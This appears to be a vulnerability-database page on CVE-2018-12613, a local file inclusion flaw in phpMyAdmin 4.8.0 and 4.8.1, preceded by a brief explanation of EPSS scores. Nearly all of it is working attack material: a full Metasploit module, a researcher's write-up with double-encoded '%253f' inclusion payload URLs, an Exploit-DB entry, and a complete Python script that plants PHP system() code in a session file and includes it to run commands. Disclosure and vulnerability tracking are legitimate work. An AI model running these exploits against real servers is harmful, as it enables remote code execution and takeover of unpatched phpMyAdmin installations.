CVE-2018-12613 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'phpMyAdmin Authenticated Remote Code Execution', 'Description' => %q{ phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. The module has been tested with phpMyAdmin v4.8.1. }, 'Author' => [ 'ChaMd5', # Vulnerability discovery and PoC 'Henry Huang', # Vulnerability discovery and PoC 'Jacob Robles' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '104532' ], [ 'CVE', '2018-12613' ], [ 'CWE', '661' ], [ 'URL', 'https://www.phpmyadmin.net/security/PMASA-2018-4/' ], [ 'URL', 'https://www.secpulse.com/archives/72817.html' ], [ 'URL', 'https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/' ] ], 'Privileged' => false, 'Platform' => [ 'php' ], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic', {} ], [ 'Windows', {} ], [ 'Linux', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 19 2018')) register_options( [ OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']), OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']), OptString.new('PASSWORD', [ false, "Password to authenticate with", '']) ]) end def check begin res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) }) rescue vprint_error("#{peer} - Unable to connect to server") return Exploit::CheckCode::Unknown end if res.nil? || res.code != 200 vprint_error("#{peer} - Unable to query /js/messages.php") return Exploit::CheckCode::Unknown end # v4.8.0 || 4.8.1 phpMyAdmin if res.body =~ /PMA_VERSION:"(\d+\.\d+\.\d+)"/ version = Gem::Version.new($1) vprint_status("#{peer} - phpMyAdmin version: #{version}") if version == Gem::Version.new('4.8.0') || version == Gem::Version.new('4.8.1') return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end return Exploit::CheckCode::Unknown end def query(uri, qstring, cookies, token) send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'import.php'), 'cookie' => cookies, 'vars_post' => Hash[{ 'sql_query' => qstring, 'db' => '', 'table' => '', 'token' => token }.to_a.shuffle] }) end def lfi(uri, data_path, cookies, token) send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php'), 'cookie' => cookies, 'encode_params' => false, 'vars_get' => { 'target' => "db_sql.php%253f#{'/..'*16}#{data_path}" } }) end def exploit unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, 'Target is not vulnerable') end uri = target_uri.path vprint_status("#{peer} - Grabbing CSRF token...") response = send_request_cgi({'uri' => uri}) if response.nil? fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage grabbing CSRF token") elsif response.body !~ /token"\s*value="(.*?)"/ fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?") end token = Rex::Text.html_decode($1) if target.name =~ /Automatic/ /\((?<srv>Win.*)?\)/ =~ response.headers['Server'] mytarget = srv.nil? ? 'Linux' : 'Windows' else mytarget = target.name end vprint_status("#{peer} - Identified #{mytarget} target") #Pull out the last two cookies cookies = response.get_cookies cookies = cookies.split[-2..-1].join(' ') vprint_status("#{peer} - Retrieved token #{token}") vprint_status("#{peer} - Retrieved cookies #{cookies}") vprint_status("#{peer} - Authenticating...") login = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'index.php'), 'cookie' => cookies, 'vars_post' => { 'token' => token, 'pma_username' => datastore['USERNAME'], 'pma_password' => datastore['PASSWORD'] } }) if login.nil? || login.code != 302 fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage") end #Ignore the first cookie cookies = login.get_cookies cookies = cookies.split[1..-1].join(' ') vprint_status("#{peer} - Retrieved cookies #{cookies}") login_check = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php'), 'vars_get' => { 'token' => token }, 'cookie' => cookies }) if login_check.nil? fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage") elsif login_check.body.include? 'Welcome to' fail_with(Failure::NoAccess, "#{peer} - Authentication failed") elsif login_check.body !~ /token"\s*value="(.*?)"/ fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?") end token = Rex::Text.html_decode($1) vprint_status("#{peer} - Authentication successful") #Generating strings/payload database = rand_text_alpha_lower(5) table = rand_text_alpha_lower(5) column = rand_text_alpha_lower(5) col_val = "'<?php eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\")); ?>'" #Preparing sql queries dbsql = "CREATE DATABASE #{database};" tablesql = "CREATE TABLE #{database}.#{table}(#{column} varchar(4096) DEFAULT #{col_val});" dropsql = "DROP DATABASE #{database};" dirsql = 'SHOW VARIABLES WHERE Variable_Name Like "%datadir";' #Create database res = query(uri, dbsql, cookies, token) if res.nil? || res.code != 200 fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create database") end #Create table and column res = query(uri, tablesql, cookies, token) if res.nil? || res.code != 200 fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create table") end #Find datadir res = query(uri, dirsql, cookies, token) if res.nil? || res.code != 200 fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory") end unless res.body =~ /^<td data.*?>(.*)?</ fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory") end #Creating include path if mytarget == 'Windows' #Table file location data_path = $1.gsub(/\\/, '/') data_path = data_path.sub(/^.*?\//, '/') data_path << "#{database}/#{table}.frm" else #Session path location /phpMyAdmin=(?<session_name>.*?);/ =~ cookies data_path = "/var/lib/php/sessions/sess_#{session_name}" end res = lfi(uri, data_path, cookies, token) #Drop database res = query(uri, dropsql, cookies, token) if res.nil? || res.code != 200 print_error("#{peer} - Failed to drop database #{database}. Might drop when your session closes.") end end end

The latest version downloaded from the official website, the file name is phpMyAdmin-4.8.1-all-languages.zip The problem appears in /index.php Find 55~63 lines Line 61 contains include $_REQUEST['target']; This is obviously LFI precursor, as long as we bypass the 55 to 59 restrictions on the line Line 57 restricts the target parameter from beginning with index Line 58 limit target parameter cannot appear within $target_blacklist Find the definition of $target_blacklist : In /index.php the first of 50 lines As long as the target parameter is not import.php or export.php, the last limit is Core::checkPageValidity($_REQUEST['target']) Find the checkPageValidity method of the Core class : Defined in the \ libraries \ classes \ core.php on the 443 line The problem is in urldecode() on line 465 We can use this function to bypass the white list detection! I ? Twice url encoded as % 253f can bypass the validation! Payload: http://127.0.0.1/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../windows/wininit.ini - - - I thought the loophole was over, because I didn't find out where phpmyadmin could perform file operations to implement Getshell . After several weeks of inspiration, I thought of a way to get Shell without writing files . We all know that after login phpmyadmin , the database is completely controllable, then we can write the WebShell to the database and then include the database file? Tested locally, I found that if you use WebShell as the field value of the data table can be perfectly written to the database file: Find the corresponding database file: Include: Payload: http://127.0.0.1/phpmyadmin/index.php?a=phpinfo();&target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/hack/hack.frm

# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution # Date: 2018-06-21 # Exploit Author: VulnSpy # Vendor Homepage: http://www.phpmyadmin.net # Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz # Version: 4.8.0, 4.8.1 # Tested on: php7 mysql5 # CVE : CVE-2018-12613 1. Run SQL Query : select '<?php phpinfo();exit;?>' 2. Include the session file : http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE) # Date: 17/08/2021 # Exploit Author: samguy # Vulnerability Discovery By: ChaMd5 & Henry Huang # Vendor Homepage: http://www.phpmyadmin.net # Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz # Version: 4.8.1 # Tested on: Linux - Debian Buster (PHP 7.3) # CVE : CVE-2018-12613 #!/usr/bin/env python import re, requests, sys # check python major version if sys.version_info.major == 3: import html else: from six.moves.html_parser import HTMLParser html = HTMLParser() if len(sys.argv) < 7: usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command] Example: {} 192.168.56.65 8080 /phpmyadmin username password whoami""" print(usage.format(sys.argv[0],sys.argv[0])) exit() def get_token(content): s = re.search('token"\s*value="(.*?)"', content) token = html.unescape(s.group(1)) return token ipaddr = sys.argv[1] port = sys.argv[2] path = sys.argv[3] username = sys.argv[4] password = sys.argv[5] command = sys.argv[6] url = "http://{}:{}{}".format(ipaddr,port,path) # 1st req: check login page and version url1 = url + "/index.php" r = requests.get(url1) content = r.content.decode('utf-8') if r.status_code != 200: print("Unable to find the version") exit() s = re.search('PMA_VERSION:"(\d+\.\d+\.\d+)"', content) version = s.group(1) if version != "4.8.0" and version != "4.8.1": print("The target is not exploitable".format(version)) exit() # get 1st token and cookie cookies = r.cookies token = get_token(content) # 2nd req: login p = {'token': token, 'pma_username': username, 'pma_password': password} r = requests.post(url1, cookies = cookies, data = p) content = r.content.decode('utf-8') s = re.search('logged_in:(\w+),', content) logged_in = s.group(1) if logged_in == "false": print("Authentication failed") exit() # get 2nd token and cookie cookies = r.cookies token = get_token(content) # 3rd req: execute query url2 = url + "/import.php" # payload payload = '''select '<?php system("{}") ?>';'''.format(command) p = {'table':'', 'token': token, 'sql_query': payload } r = requests.post(url2, cookies = cookies, data = p) if r.status_code != 200: print("Query failed") exit() # 4th req: execute payload session_id = cookies.get_dict()['phpMyAdmin'] url3 = url + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}".format(session_id) r = requests.get(url3, cookies = cookies) if r.status_code != 200: print("Exploit failed") exit() # get result content = r.content.decode('utf-8', errors="replace") s = re.search("select '(.*?)\n'", content, re.DOTALL) if s != None: print(s.group(1))